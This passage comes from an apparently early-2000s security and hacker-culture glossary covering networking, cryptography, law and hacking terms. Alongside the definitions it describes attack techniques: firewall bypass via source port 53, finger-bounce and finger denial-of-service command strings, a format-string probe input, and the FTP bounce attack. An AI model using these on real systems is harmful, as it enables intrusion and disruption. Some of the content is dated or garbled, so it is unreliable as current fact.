The normal record that contain an name to IP address mapping. |
|---|---|
| LOC ^ |
The geographic location containing latitude,
longitude, altitude, and size. Altitude is
meters above sea level. Size is the exponent in the in meters of
the volumetric size of the object. Hackers sometimes use these records
to find where you are located physically. Humor: The original name of this record was ICBM. |
| HOST ^ |
HOST records can contain information about the machine, such as if it is a Windows or UNIX machine. Administrators probably should not fill them in; they are dangerous. |
| PTR ^ |
Provides a reverse mapping: given an IP address, this record maps it to a host name. People may find this confusing that DNS doesn't automatically provide reverse mappings, but the lack of this inherent ability is fundamental to the nature of DNS. For example, multiple names can map to a single IP address, and there is the question of which DNS servers are responsible for supplying the reverse map. |
Technique: Since DNS is critical to the network infrastructure, a lot of firewalls have been configured to pass any packet with a source port of 53. An intruder can set his/her own traffic to start from that port, bypassing the firewall to attack any other service.
Technique: A lot of programs (clients, servers, loggers) are written with buffer overflow bugs that trust the data returned to them. They trust that all names will be less than 256 characters long, and they trust that all IP addresses will be 4 bytes long. By sending DNS packets that break these rules, you can often break into such systems.
Example: Some classes of DoS are:
Example: Some famous DoS attacks are:
Culture: A common word for DoS is "nuke", which was first popularized by the WinNuke program (a simple ping-of-death expoit script. These days, "nukes" are those DoS exploits that script kiddies in chat rooms use against each other.
See also: SYN flood
Example: Microsoft Windows supports backwards compatible logon mechanisms to support clients from the days of DOS (Disk Operating System) and WfW (Windows for Workgroups). A hacker can setup a server that claims to be one of these older systems. If the hacker can convince clients to connect, they will automatically downgrade their security to a level that can easily be cracked.
Example: GSM cell phones use public-key techniques to establish an encrypted channel. However, such technology is not exportable to certain nations that the developed countries are afraid of (Iran, Iraq, North Korea, etc.). A hacker could therefore setup a base-station that claims to be located in Tehran (instead of the real location outside London). Mobile phones will automatically downgrade themselves and log in, allowing interception with a classic man in the middle attack.
Contrast: Whereas RSA is based upon the mathematical problem of factoring large numbers, DSA is based upon the discrete logarithm problem. DSA generates signatures faster; RSA verifies signatures better.
Contrast: The terms DSA and DSS are essentially the same and are generally used interchangeably. DSS (Digital Signature Standard) is a government document mandating the use of DSA (Digital Signature Algorithm). They are both part of the same FIPS-186 document.
Key point: The DSS specification provides for keys only up to 1024-bits. This is considered "weak" and probably breakable in a few years. Some products (e.g. PGP) allow non-standard larger keys to be generated.
History: The standard was created by NIST with the help
See also: RSA, Diffie-Hellman
Key point: DSL typically uses ATM, a layer-2 cell-switching fabric. The DSL provider typically providers no Internet services, a layer-3 service. Instead, it connects you to an ISP of your choice. The layer-2 ATM service is vulnerable to being hacked. Also, you will see traffic such as broadcasts from your layer-2 neighbors.
Contrast: Traditional modems are end-to-end. Since the connections between COs are 56-kbps, it is impossible to exceed 56-kbps with normal modems. Since DSL only connects to the local CO and then directly to the Internet, it is only limitted by how fast data can be transmitted across the local loop.
Key point: Phreakers often have their own devices to generate the tones for dialing so that they don't have to use the keypad (such as when payphones disable the keypad as part of their defenses). In the old days, this would consist of custom integrated circuits that generated just the right tones. These days computers are used. For example, there are programs for hand-held computers like Palms that generate the needed tones.
Key point: The frequencies generated by the keypad are:
| 1209-Hz | 1336-Hz | 1477-Hz | 1633-Hz | |
|---|---|---|---|---|
| 697-Hz | 1 |
ABC 2 |
DEF 3 |
"A" |
| 770-Hz | GHI 4 |
JKL 5 |
MNO 6 |
"B" |
| 852-Hz | PRS 7 |
TUV 8 |
WXY 9 |
"C" |
| 941-Hz | * |
oper 0 |
# |
"D" |
Point: DTMF tones are used in many other applications these days because of the high-availability of equipment.
Key point: DTMF decoders are often used to record the telephone numbers people call in pen register situations. Your personal computer can be used to record DMTF tones and decode them in software.
Contrast: The word dual-homed could refer to a router, but is usually used to clarify that the system has multiple network connection, but it NOT supposed to provide briding/routing/interconnection services between them. Dual-home systems are a prime target of hackers because when they are subverted, they provide a prime way to compromise networks. Examples:
Key point: Dumpster diving is generally legal, as long as you are not trespassing.
Key point: Data can usually be recovered from "failed" disks, including floppies, hard-dirves, and CD-ROMs. People ofte assume that just because they cannot read the data from the disks that nobody can. The truth is that most such disks thrown by companies into the trash contain interesting data that can easily be read. CD-ROM backups are particularly attractive because they are very sturdy.
[ e-mail | ECB | Echelon | ECPA | EDI | eggdrop | eggies | Electronic Code-Book | ElGamal | Eligible Receiver | elite | elliptic curves | emoticon | encipher | encode | encoding | encrypt | encryption | endian | entropy | escrow | Eternity | Ethernet | ethical-hacking | ethics | EUDDP | exclusive-or | executable | exploit | exploitz ]
Key point: ECB mode is extremely dangerous because it allows messages to be altered. Let's say that a financial transaction always places the dollar value in the same location in the message. An attacker can capture one message and its dollar value, then replace that section of the second message. This is known as a "rewrite-attack" or a "cut-and-paste attack".
Key point: ECB mode is also dangerous because it makes "known-plaintext" attacks easier.
Key Point: During World Word II, the "UKUSA" alliance was formed. This was an agreement between the intelligence organizations of the United States and the United Kingdom to echange certain information dealing with cracking German codes. This alliance has continued to this day, and been expanded to other English speaking countries like Canda, Australia, and New Zealand. The United States has a broad range of "exhange and liason agreements" with many intelligence organizations, even with countries normally thought of as adversaries. For example, the NSA worked with the Communist Chinese to put monitoring stations to spy on the Soviet Union; these stations were then run in a joint manner. The rumors surrounding Echelon vary in how many of these agreements include Echelon-style monitoring.
Point: The playfull thing to do nowadays is to "jam" echelon by sprinkling potential key words in documents such as "plutonium", "bomb", etc.
See also: Carnivore
Controversy: The law was originally promoted by privacy and civil rights origanizations. However, subtle changes that made it into the final version ended up being what privacy advocates called "a wish list for the law enforcement community". Some important privacy problems:
Key point: Reading e-mail exchanged over public systems by anybody other than the sender or recipient is a felony. However, accidental reading of e-mail by a network administrator is allowed.
See also: key recovery, Carnivore, ISC TITLE 18 part 1 chapter 119 sections 2510 and following
History: The word "elite" has long been used in the community, starting with BBSs in the 1980s where it denoted a user who was privileged to read certain files. The word was dramatized in the 1995 movie Hackers, which has put it soundly in the position as the "official" word for top ueberhackers.
Culture: This word finds itself mangled in many variations: eleet, leet, 1337, 31337, etc.
Statistics: Ira Winkler, former analyst at the NSA and now writer, estimates that as of 1999, that there are roughly 500 to 1000 "elite" hackers capable of finding new security holes, and roughly 5000 hackers capable of creating exploit scripts. (He further estimates about 100,000 script kiddies).
Contrast: Script-kiddies are interested in wielding magical powers, but are not interested in how things work. The elite are interested in how things work, and only later realize they have magical powers.
Contrast: An elliptic curve key of roughly 160-bits is equivalent in security to a RSA or DH key of 1024-bits. Elliptic curve systems are dramatically faster than RSA or DH, which makes them useful in smart-card applications that have anemic CPUs. Certicom (the owner of many elliptic curve patents) recommends a public-key size of roughly twice the size of the symmetric-key to provide equivalent security.
Point: While elliptic curves have many advantages (size, speed) over other techniques, they are a lot newer and therefore not trusted.
Examples:
| AFAIK | "As Far As I Know" |
| AFK | "Away From Keyboard", I am not sitting in front of my computer right now, so I won't be able to see messages or respond to them. |
| ATM | "At The Moment", right now, this very instant. |
| BBIAB | I'll "Be Back In A Bit", not as soon as BRB, but sooner than BBIAHOS. |
| BBIAHOS | I'll "Be Back In An Hour Or So" |
| BBL | I'll "Be Back Later", I'm not quite sure, but possibly later on today. |
| BRB | I'll "Be Right Back", probably within a minute or two. This is the most popular acronym for stepping away for a moment. |
| GMTA | "Great Minds Think Alike" |
| IB | "I'm Back" after being AFK. |
| IIRC | "If I Recall Correctly" |
| IMHO | "In My Humble Opinion" |
| IRL (or r/l) | "In Real Life" |
| LOL | I am "Laughing Out Loud" |
| OMG | "Oh My God" |
| ROTFL | I am "Rolling On The Floor Laughing" because what you said was so funny. |
| TIA | "Thanks In Advance" |
| WB | "Welcome Back" after you were AFK. |
| YMMV | "Your Mileage May Vary", what you experience may be different than than mine. |
Point: Some e-mail threats are:
Contrast: Encoding is not encryption. A lot of passwords are sent across the wire encoded (such as HTTP's BASE64 encoded passwords). In essence, they are still clear-text passwords; most password sniffers will still read them from the wire.
Example: The main issue with encoding is how to get binary data sent within a text message. For full binary data, this results in about 40% "expansion" of the file size (i.e. when you e-mail 1-megabyte of data to a fried, this encoding will result in about a 1.4-megabyte message size).
Key point: E-mail clients typical support more encoding methods than content scanners (aka. anti-virus scanners). Therefore, by encoding your e-mail correctly, you can often bypass these.
Key point: A big problem in the security industry is the presences of redunant encoding methods Microsoft's web servers were hacked because of redundant ways of encoding UNICODE characters. TODO
See also: UNICODE
Analogy: Some aliens come down to earth and give you a safe, and a key to the lock. For purposes of this discussion, the aliens use some magic technology that is beyond our human understanding, and that we will never be able to break into the safe. You steal something, put it into the safe, and lock it up with the key. You hide the key. The police arrest you and confiscate the safe. The only way the police will ever recover this stolen object is when you give them the key. Encryption is the same way; it creates an unbreakable box that you can put data in that nobody can ever get back out unless they have the appropriate key.
Controversy: Encryption has massive philosophical implications when put into widespread use. It means that citizens can hide their data from governments (especially repressive ones) and law enforcement (especially when you are committing a crime). This has the potential of making governments more accountable to the populace. It likewise has the potential of making crime easier.
Key point: Encryption tends to be the strongest link in the chain. When encryption is cracked, it is usually through some other weakness like key distribution or weak passwords.
Contrast: Asymmetric encryption uses different keys for encryption and decryption. Since the most useful form of this is one you keep one key private and make the other public, this is better known as public key encryption. In contrast, symmetric encryption uses the same key for both encryption and decryption.
Notes: Some algorithms popular in cryptography are: DES, rc4 Some popular applications that use encryption are: PGP, web browsers. Some protocols that use encryption are: SSL, IPsec
Misconception: The term "endian" refers only to the ordering of bytes within 2-byte, 4-byte, and 8-byte integers. It does not refer to the ordering of bits within a byte, nor does it refer to other ordering issues.
History: The name comes from Swift's story Gulliver's Travels. Lilliput is divided into two warring camps. The "big-endians" believe that eggs should be broken at the larger end in the traditional way. However, the Emperor has decreed that all his subjects should break their eggs on the smaller end. Swift is satirizing the Protestant vs. Catholic conflict in England during his time. In 1980, Danny Cohen published a paper entitled "On Holy Wars and a Plea for Peace" where is draws a parallel between the silly wars over how to crack an egg and the silly wars over the "proper" ordering of bytes in memory. Since that time, people have begun to refer to the alternate byte orderings as "little-endian" and "big-endian". The funny thing is that people who continue to fight this Holy War now use these terms as well, totally unaware of the irony.
Key point: Popular UNIX systems started on Motorola processors and continued with RISC designs that were all big-endian. For this reason, the Internet is based upon big-endian network protocols. This is known as "network byte order". However, the Intel x86 processors which account for 90% of the systems in the world are little-endian. Microsoft Windows has many bugs and anomalies in their TCP/IP stacks due to endian issues that allow their systems to be easily fingerprinted.
Analogy: For example, one company provide software that another company sells imbedded in their hardware. The second company (the OEM) is scared that the first company may go out of business, so requests that the first company put the source code for the software in escrow. Should the first company go out of business, the second company would still be able to sell their product.
Key point: Law enforcement is constantly pushing for key escrow where a third party holds back-door keys to all encryption products. Law enforcement would then be able to obtain these keys with a court order into order to decrypt messages or eavesdrop on communications. They first propose a variant of the two-person rule in order to prevent abuse of the system.
See also: anarchy
Key point: Every Ethernet adapter has a unique 6-byte MAC address. The first 3-byte identify the manufacturer, the second 3-bytes are assigned by the manufacturer. If two adapters have the same MAC address, then communications errors will occur (just as if you named both your kids "George", then they'll be confused as to which one you are talking to). Making the adapter addresses globally unique then assures that they will be locally unique when plugged into the same LAN. However, it has security/privacy implications. A chain of events led to the MAC addresses becoming imbedded into Microsoft Word documents, which helped track down the author of the Melissa virus. Similarly, Network ICE's products scan the intruder with a number of protocols that may reveal the MAC address of an intruder.
Key point: Ethernet was originally designed as a "shared medium", which means that every adapter on the wire sees all traffic. In normal operation, an Ethernet adapter discards all traffic that doesn't contain its MAC address. However, that filter can be turned off, putting the adapter in promiscuous mode. This converts the machine into a sniffer which can eavesdrop on everyone's traffic.
The basic format of an Ethernet frame is:
+--------+--------+--------+--------+--------+--------+ | Destination MAC Address | +--------+--------+--------+--------+--------+--------+ | Source MAC Address | +--------+--------+--------+--------+--------+--------+ | EtherType | +--------+--------+ ... payload (46-bytes to 1500-bytes) ... +--------+--------+--------+--------+ | CRC | +--------+--------+--------+--------+These days, the most common payload is IP which is identified with an EtherType of 0x0800. Note that as soon as the payload leaves the local Ethernet (through a router), the local Ethernet headers are stripped off. Only the payload itself will traverse the Internet; local Ethernet information (like your MAC address) does not. (Hackers may still be able to retrieve your MAC address through NetBIOS or SNMP, though).
Note that the CRC protects against accidental corruption of the frame, but not intentional corruption.
Key point: The general public have the belief that hackers have no ethics. This is not true; they have a different set of ethics. For example, when hackers deface a website, they usually follow their own ethics of not otherwise harming the system and making it easy for the owners of the website to repair the system.
See also: white-hat hacker, hacktivism
Contrast: Newbies often don't understand the difference between executables and normal files. For example, they don't understand the difference between opening an e-mail attachment with a .txt extension vs. a .exe. This misunderstanding comes about because GUIs like Windows and the Macintosh do a very good job at hiding technical details like this from users as to not upset them.
Example: ActiveX, Java, JavaScript, .exe files, programs.
Culture: Exploits are the key to hacker subculture. Hackers gain fame by discovering exploits. Others gain fame by writing scripts for them. Legions of script-kiddies apply the exploit to millions of systems, defacing webpages and gaining (in)fame.
Controversy: There is no good definition for this word. It is debated a lot trying to define exactly what is, and is not, an exploit.
Key point: Since people make the same mistakes over-and-over, exploits for very different systems start to look very much like each other. Most exploits can be classified under major categories: buffer overflow, backtracking, defaults, samples, Denial of Service
Contrast: The words exploit and vulnerability are often used interchangeably. This is because the person who discovers a new vulnerability will usually write an exploit script for it at the same time. Therefore, the vulnerability is often known by the name of the exploit scriptl.
[ factoring | factorization | fail-close | fail-open | fail-safe | false positive | FBI | fiber optics | File and Print Sharing | File Transfer Protocol | FIN | finger | fingerprint | firewall | FISA | flame | Flame-bait | flood | FOIA | forensics | forgery | format-string attacks | Fortezza | fragment | fraud | FTP ]
127 X 131 = nIn contrast, try to find the values of m and n in the following equation using a pen and paper.
m X n = 24289The second equation above is known as factory. It is difficult to not only do by hand, but also by computers.
Key point: Note that in the example above, I use a small number (24289) simply to demonstrate that multiplication is easier than factoring. Somebody sent me e-mail proposing that factoring 24289 is not too difficult, you simply brute-force calculate 24289/n for all n between 1..24289, and the results that are integers are factors. However, in cryptography, the numbers used are actually much larger, and look something like:
6237804950192837659018341982347561398740112837491903875781783635465346657897987894783717848757929837483241243454656677787898908978775756362515414353646768798980798873897890141298374873838929102938578Using the combined computing power of all the world's computers, it would take longer than a billion times the age of the universe to use the simple technique to solve this problem. Actually, longer, but I'm trying to use comprehensible numbers. Remember that if I add a digit to the number I'm trying to factor, it will take ten times longer to compute. For example, the number 242891 takes ten times longer to search through than 24289. Likewise, every nine digits you add to a number causes the search to take a billion times longer. There are several mathematical techniques easier than brute-force factoring, but all of them are hard.
Key point: Currently, it is unknown exactly how difficult factoring numbers is. Today's public-key infrastructure would crumble if someone found an easy to way to factor such numbers.
Feedback: Michiel Brandenburg provided the following tidbit from his reader in RSA cryptography:
An interesting tidbit about the complexity of factorization as in trying to crack (for instance RSA) brute-force like. The fastest factoring algorithm to date (I think) was thought of by Richard Schroepple (undocumented) which can factorize n in approximatly: exp(sqrt(ln(n)*ln(ln(n)))) opperations a simple table: Digits Number of opperation Time** 50 1.4x10^10 3.9 hrs 75 9.0x10^12 104 days 100 2.3x10^15 74 years 200 1.2x10^23 3.8x10^9 years 300 1.5x10^29 4.9x10^15 years 500 1.3x10^39 4.2x10^25 years note (**) this is considering that a computer can handle one opperation per microsecond
Confusion: The terms "fail-open" and "fail-close" are frequently used to mean the opposite of each other. Some people think of a door, which when "open" allows things to pass through. Other people think of an electrical circuit, when "open" stops the flow of current (and conversely, a "closed" circuit passes current). Therefore, use the word "fail-safe" instead in order to avoid confusion.
Analogy: The electrical circuit-breakers in your home are fail-safe switches using this concept. In the case of an electrical fault causing a short, the circuit breaker will blow open, halting the flow of electricity. This prevents a fire from starting.
Analogy: Infrared inrusion sensors in the home have the problem that they frequently trigger on household pets, especially cats. This is a "false positive". Cats have a much higher body temperature than humans, so one way of preventing the false positive is to ignore high temperature signatures. In much the same way, IDSs are often tuned to cut out common false positives.
Controversey: There is a debate over "correct" diagnoses of intrusion attempts that don't succeed. For example, there is a large background-radiation of port scans. Many people do not want the IDS to trigger on them. Likewise, there are many intrusion attempts that cannot succeed, such as Solaris exploits directed against Windows machines. Again, many people do not want the IDS to trigger in this case. Because such scans and attempts are quite common, IDSs tend to be "chatty" -- showing a lot of information that doesn't indicate serious attacks. Those who do want to see such information sometimes call these false-positives, those who do want to see it do not call them false-positives.
Misconception: The FBI isn't the only federal police, others include the Secret Service, BATF (Bureau of Alchohol, Tobacco, and Firearms), DEA (Drug Enforcement Agencey), the INS, IRS, and others.
Contrast: In theory, FBI is not allowed to operate outside the U.S., while other intelligence organizations (CIA, NSA) are not allowed to operate inside the U.S. In recent years, the FBI has been allowed to carry out operations in foreign countries such as Russia and the Sudan.
Point: Eavesdropping on fiber links is not so difficult. Optical taps using special merrors typically use a 90%/10% split: they allow 90% of the signal through, siphoning only 10% of the light off to the eavesdropping equipment. Another technique involves bending the fiber slightly and disolving the insulation/cladding with solvents. This allows secret tapping without being detected. Optical TDM (time domain reflectometers) may be used to detect such taps. [US Patent: 4887879]
Point: Fiber is often used to combat TEMPEST monitoring. However, electromagnetic waves can travel down fiber cables, accidentally leaking information that can be monitored outside a protected environment.
Key point: The problem is that TCP/IP knows no boundaries. When a user tells the system to share files with the rest of the familly, the user is not quite aware that this means the files are shared with the rest of the Internet. This means that anybody, anywhere on the Internet can at any time connect to the machine and read/write files. To see if somebody has accidentally shared their hard-disk, right-hand-mouse-click on "Network Neighborhood" in Windows, select "Find Computer...", then type in that user's IP address.
Key point: File and Print Sharing used the SMB protocol over NetBIOS on TCP port 139.
Example: The following shows the output of the command "finger rob@rh5.robertgraham.com":
Login: rob Name: Robert David Graham Directory: /home/rob Shell: /bin/bash On since Fri Dec 3 18:13 (PST) on ttyp0 from gemini No mail. No Plan
Key point: The finger command reveals extensive information. For example, if I were attacking the above machine, I would notice that the user is running bash Therefore, I may try something like http://rh5.robertgraham.com/ against the user, which in about 1% of the cases will give me a history file of recent commands they've entered, which may contain passwords and such.
Key point: There are a number of fun things you can do with finger. The first is that you can use the "finger bounce" technique. Finger servers will often forward requests for you. The command:
finger rob@robertgraham.com@example.comwill query example.com for rob@robertgraham.com. You can use this technique to hide where your are coming from. On some systems, you can do a DoS attack by sending a finger command like:
finger rob@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@robertgraham.comcausing the system to go into a loop trying to resolve this. There are also special names you can finger. An empty name will sometimes list the currently logged on users, or sometimes all users with accounts on a machine. The special names of "0", "*", "**" will sometimes have similar effects.
Key point: One of the key reasons for fingerprinting a system is to search for "old" or "unusual" systems. Non-computer devices like routers, printers, modem banks, etc. are not written to the same level of security standards as real computers. In addition, a hacker may be able to find old SunOS 4 systems which are rife with well-known security flaws.
A firewall acts as a "choke point". Corporations install firewalls between their internal (private) networks and the (public) Internet. All traffic between the corporation and the Internet flows through the firewall. It acts as a "gate" with virtual guards that examines the traffic, and decided whether to allow it or block it.
Misunderstanding: Many people believe that a firewall makes your network immune to hacker penetration. Firewalls have no ability to decide for themselves whether traffic is hostile or benign. Instead, the administrator must program the firewall with rules as to what type of traffic to allow or deny. This is similar to a guard checking badges at a gate: the guard can only detect if the badge is allowed/denied, but cannot detect impersonations or somebody climbing the fence in the back.
Key point: Firewalls are based on the principle of blocking everything by default and only allowing those things that are absolutely necessary.
Key point: Firewall administrators are frequently at odds with their management. Executives are frequently frustrated by things that don't work in the network. They don't understand how difficult it is to secure each new application, or the increased risks involved.
Controversy: A lot of time is wasted on trying to come up with the exact definition of the word "firewall", usually by marketing flaks or nerds with attitude. The term isn't well defined. Most people equate firewalls with packet filters. Others include proxy servers and NATs along with the definition.
Misunderstanding: A common question posed is "what is the best firewall?". People who ask the question mean "what stops hackers the best?". This is based upon the same misunderstanding highlighted above: firewalls isolate you from the Internet in the hopes of reducing exposure to hackers. The best firewall that will protect you best from hackers is therefore to completely isolate yourself from the Internet (i.e. don't use the Internet at all). If you want to use the Internet, then you will have some risk due to hackers that firewalls cannot prevent. For example, if you tell the firewall to accept incoming e-mail, then you are suddenly at risk to hacks against e-mail (either viruses, or attempts to force spam through your server). Therefore, the most secure firewall tends to be the cheapest, such as the basic packet filters built into most routers and operating systems. The more expensive firewalls allow you to secure more applications through the firewall, but the more features that you use, the more applications you expose, and ultimately the more risk you undertake.
Misunderstanding: Some vendors are selling personal firewalls. This is based upon the misconception highlighted above: firewalls do not block hacker traffic, they are instead a (blunt) tool that allows security administrators to reduce risk. Putting packet filters in the hands of end-users doesn't give them the necessary expertise to secure their systems against hackers. There is also the issue that properly configuring a firewall is actually more difficult than hardening a single machine in the first place. It is only worthwhile because one firewall controls access to hundreds/thousands of machines. Putting a single firewall on a single machine isn't really worth the effort.
Point: The Federal Intelligence Surveillance Court (FISC) consists of seven judges who issue these secret orders.
Key point: In February of 1995, President Clinton signed Executive Order 12949 authorizing black-bag operations (secret break-ins) as part of FISA.
Point: There is nothing you can say that won't offend somebody.
Point: Flame-bait is the conscious crafting of messages designed to encourage others to respond with flames. As pig farmers from Kansas say, "Never wrestle with a pig in the mud. You'll lose, and the pig loves it".
See also: netiquette, cyberstalking
Examples:
Key point: FOIA makes sharing information with the government more difficult. Anything you reveal to the government can be retrieved and read by other people. You cannot easily share secrets with the government. For example, under the Government/industry alliance InfraGuard, private organizations are unwilling to share data with the government because of FOIA.
Point: Records FOIA requests themselves can be queried using FOIA. Therefore, you can track down what somebody is interested in by filing a FOIA request for their requests. This is sometimes used by one journalist to discover what another journalist is doing a story on (and "scoop" them). If you are truly paranoid, go through anonymous sources for FOIA requests (e.g. pay the EFF to do it for you).
Point: Anybody can make a FOIA request: citizens, foreigners, organizations, universities, businesses, state/local governments. Foreign governments hostile to U.S. interests (e.g. China) regularly take advantage of FOIA.
Examples:
printf("%02d:%02d:%02d", hours, minutes, seconds);This will print
the time in a format that looks like "09:15:00" (i.e. printf("greetings=%s", "hello");This prints the output: greetings=HelloHowever, if you wanted to be lazy, you could simply program the system:
printf("greetings=Hello");Up to this point, everything is fine. The
problem comes about when the string is read from input: g = read_input(); printf(g);The programmer is expecting the user to enter normal input such as "Hi". However, the user could enter something like "die %s". This makes the above statement equivalent to:
printf("die %s");Since there is no following string, this may cause
the program to crash. The correct way that this should have been handled is: g = read_input();
printf("%s", g);
Printf will treat the first parameter as the format string, but will
know not to interpret any formatting characters in subsequent strings.
Key point: A popular technique to see if a system is possibly vulnerable to format string bugs is to send the input "%x %x %x". If the hacker sees hex output, then they know the system was vulnerable to format string bugs.
Example: Ethernet supports a maximum packet size of 1500 bytes. Therefore, in order to send an IP packet of 2000 bytes, the system must first fragment the packet into two pieces before transmission. The other end will then reassemble them back into a single packet on the other end.
Contrast: The general concept of fragmentation applies to all layers of the protocol stack. For example, ATM has a maximum frame size of 48-bytes, which is too small and inefficient for any purpose if higher layers had to deal with it. Therefore, the ATM adapter itself handles the fragmentation and presents a "virtual" interface that allows a full 64-kilobyte packet to be sent without IP level fragmentation. Conversely, when reading files from a file server, even a 64-kilobyte packet size is too small, so the file server layer automatically requests smaller parts of the file. In some cases, applications will attempt to calculate the MTU (Maximum Transmission Unit) of the connection in order to optimize operations to avoid any IP fragmentation.
Key point: IP fragmentation is slow, and is better handled either below the IP layer (like ATM) or above it (like in the application layer).
Key point: Fragmentation and reassembly is difficult to program right. Therefore, there are many ways to hack this feature. Some attacks are:
Key point: Most network-based intrusion detection systems do not reassemble packets. Therefore, a hacker can use something like fragrouter in order to evade the IDS.
Key point: Fragmentation is almost never needed. Most communication runs over TCP, which does its own segmentation which is more efficient. Therefore, if you see any fragmentation on your network, you should examine it closely to see if it indicates an attack.
Key point: FTP uses an outgoing control connection that only sends commands to the server and receives returned status information. All data is transferred on separate connections (one connection for each file or directory transferred).
Key point: Before the web (and graphical browsers) people used command-line versions of FTP. These are still preferred by hackers, becuase GUIs are often too "noisy" (generating unnecessary commands). Such command-line clients that are still included in virtually all UNIX or Windows systems.
Key point: These separate connections are created by sending a PORT command across the control connection. This command accepts both and IP address as well as port number that tells the other side where to connect. Example: PORT 192,2,0,201,10,1 is the string sent across the control connection to tell the server that the client has opened a port on the machine with the IP address 192.2.0.201 with port 2561. The server will then open up a TCP connection as instructed. This command is sent invisibly when the client requests a directory listing or file; all the client sees of this happening is a status message to the effect 200 PORT command successful. which is sent back across the control connection. A neat hack is to specify somebody else's IP address in this command. This hack is called a bounce attack, and can be used to port scan computers or subvert trust relationships.
Key point: An outgoing connection is used for control, but the data is sent on an incoming connection. Packet filtering firewalls block incoming connections. Therefore, a user will see that they can connect to the FTP server, but directory listings and file transfers don't work.
Key point: In order to solve the incoming connection problem, FTP supports a mode called PASV that forces all connections to be outgoing. Web-browsers like IE and Netscape use PASV mode by default. Command-line FTP clients typically don't support PASV; but people try "quote PASV" commands anyway.
Key point: Lots of FTP servers have buffer overflow exploits in them.
Key point: The control connection is text based, so you can use Telnet or netcat as your client (if you understand the protocol).
Protocol:
| -> Connection from client to
ftp.robertgraham.com:21 <-220 ftp.robertgraham.com Microsoft FTP Service (Version 4.0). ->USER anonymous <-331 Anonymous access allowed, send identity (e-mail name) as password. ->PASS test@robertgraham.com <-230 Anonymous user logged in. ->PORT 192,0,2,123,10,37 <-200 PORT command successful. ->RETR /example.txt <-150 Opening ASCII mode data connection for example.txt(14 bytes). <- Connection from ftp.robertgraham.com:20 to client:2597<-226 Transfer complete. ->QUIT <-221 -> Close connection |
| -> Connection from client to
ftp.robertgraham.com:21 <-220 ftp.robertgraham.com Microsoft FTP Service (Version 4.0). ->USER anonymous <-331 Anonymous access allowed, send identity (e-mail name) as password. ->PASS mozilla@ <-230 Anonymous user logged in. ->PASV <-227 Entering Passive Mode (209,31,36,212,6,123). ->RETR /example.txt -> Connection from client to ftp.robertgraham.com:1659<-125 Data connection already open; Transfer starting. <- File contents<-226 Transfer complete. ->QUIT <-221 -> Close connection |
Example:
[ GLBA | Globally-unique Identifier | Gopher | GPS | grind | grok | GUID ]
Controversy: The primary tool that GLBA provides is where the customer tells the financial institution that they want to "opt-out" of all disclosures, preventing the company from telling anybody else about the customer. Some people want this to be an "opt-in" instead. Other people think that this law is too extreme -- it doesn't give power to the consumer to only partially opt-out. In other words, a consumer can't benefit from partial disclosure.
See also: privacy
Key point: There are still a lot of Gopher servers out there, However, since they are no longer mainstream, they are rarely maintained by security people. Therefore, they often present a way to compromise the network.
Controversy: When recent U.S. laws take effect, the FBI will be able to serve a warrant and find the GPS location of cell-phone users. This will likely be done by getting the GPS coordinates of ground stations, then triangulating for the location of the cell-phone from multiple ground-stations. While this helps emergency services, it also provides the opportunity for abuse by law enforcement to track people.
Controversy: In the year 2001, within the U.S., thousands of portable tracking devices containing GPS and cell-phone units were used to track criminals under house arrest, probation, parole, or some other supervision. Civil libertarians worry that as technology improves, such systems will be increasingly used to track the population.
Contrast: Older ground-based positioning systems include the Loran-C system for ocean navigation around North America, and VOR (VHF Omnidirectional Range) system of ground-based stations guiding airplanes. The Russian GLONASS (GLObal NAvigation Satellite System) is an alternate system of 24 satellites that provides a similar service operational since 1995. Note that GLONASS is also a GPS system; what is generally called GPS is more accurately named as the "NAVSTAR" GPS system. The European Union plans to make their Galileo GPS operational by 2008, providing (in theory) greatar accuracy and QoS.
Key Point: Until May of 2000, the American military fudged the numbers forcing non-military GPS receives to be somewhat inaccurate. One "hack" to get around this was "differential" GPS (DGPS) that compared signals against ground-based stations (and commercial satellites) in order to improve a accuracy to nearly that of military receivers. Combining both the NAVSTAR and Russian GLONASS systems also promises further accuracy. As of 2001, while GPS has a theoretical accuracy within 100-meters, must customers average about 3-meters, with occasional maximum inaccuracies of 10-meters. Many believe that by 2005, it is likely that consumers will be able to purchase systems with accuracy down to 1-meter. The U.S. government enforces "Selective Availability", which means it turns off the GPS over certain countries (like Iraq or Afganistan).
Analogy: If someone steals your bank card, they cannot sit in front of the cash machine and guess all possible PIN numbers. After a certain number of unsuccessful tries, the bank machine will "eat" the card.
Key point: Secure systems (UNIX, Windows NT) lock out accounts after a certain number of unsuccessful tries. These lock-outs can either be temporary (and restore themselves automatically), or permanent until an administrator intervene and unlocks the account.
Key point: Non-secure systems (Win9x and many software applications) do not lock out accounts. For example, if you have Win9x "File and Print Sharing" turned on and protected with a password, a hacker can try continuously and invisibly to gain access to your machine. Nothing is logged, nothing is locked out.
Contrast: When brute-force cracking, the hacker does all the calculations himself (comparing them against the stolen encrypted password file). When doing a grind, the hacker must enter the passwords one by one, and the target system does the calculations to see if they are valid. An intrusion detection system can detect grinds, but not cracks.
Key point: People get confused by the words used to describe thing, often missing the true meaning. Examples:
History: The word comes from the book Stranger in a Strange Land by Robert Heinlein. This was a popular counter-culture book in the 1960s, and is a popular Science Fiction book today.
Key point: One of the precepts of Zen philosophy is that the important concepts of life cannot be described by words, and therefore there exists no written description to the path of enlightenment. Grokking means to understand something at a level beyond what mere words can express.
Key point: There are three levels of understanding, which can be illustrated by looking at a cars engine. At the first level, people look at all the parts and say to themselves "This is unnecessarily complicated, I'm sure there is a way we can remove many of these parts and make it simpler". Probably 99% of the population approaches life in this manner. The second level is an engineer who understands how the engine works, and how the various parts work together in the ingenious fashion that they do. This engineer understands that this the simplest way to produce an engine, and that it has reached this stage after years of being perfected by countless engineers. At the third level is the godlike engineer that understands how to remove one part in order to make the engine even simpler. In this analogy, the engine is the computer. Likewise, the Internet is populated by script-kiddies who are constantly searching for ways to learn about hacking without being bothered by all the unnecessary complexity.
Key point: The failure to grok is often due to failure to understand the correct abstractions. Understanding a thing requires understanding the context in which that thing lives. If one cannot step out of a traditional context in order to regard a thing within the proper context, one cannot grok it. For example, many people have trouble grok the layering of network protocol because the only can only see what the protocols due for them, not what the protocols due in general. Therefore, when they look at protocols, all they see is large amounts of inscrutable unnecessary complexity.
Key point: Microsoft got in trouble in 1999 for automatically shipping up the GUIDs as part of its registration process.
Key point: GUIDs are sometimes placed within hidden fields within Microsoft documents (Word, Excel), allowing the original author to be identified. This was used in order to help track down the author of the "Melissa" worm.
